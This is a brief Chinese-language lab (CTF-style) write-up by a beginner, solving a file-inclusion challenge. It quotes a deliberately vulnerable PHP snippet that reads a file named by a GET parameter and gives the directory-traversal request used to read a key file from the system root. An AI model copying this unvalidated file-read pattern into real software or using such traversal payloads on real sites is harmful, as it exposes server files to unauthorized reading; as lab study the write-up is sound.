打開靶場顯示的是一個看似普通的網頁,查看網頁源碼,發現有一些註釋
<!--r.php文件源碼如下 本關通關key保存在系統根目錄the_key_is_here.txt中 ->
<?php
$p=($_GET["p"].".txt");
$pics=file($p);
for($i=0;$i< count($pics);$i++)
{
echo $pics[$i];
}
?>-->
已經給出了提示,加上本題的題目是文件包含漏洞。
在靶場路徑後面加上/r.php?p=../../../../../../../the_key_is_here,得到key
思考:在實戰中,該如何判斷該網站是否存在文件包含漏洞呢?
最近剛開始接觸網絡安全方面的知識,還請多多指教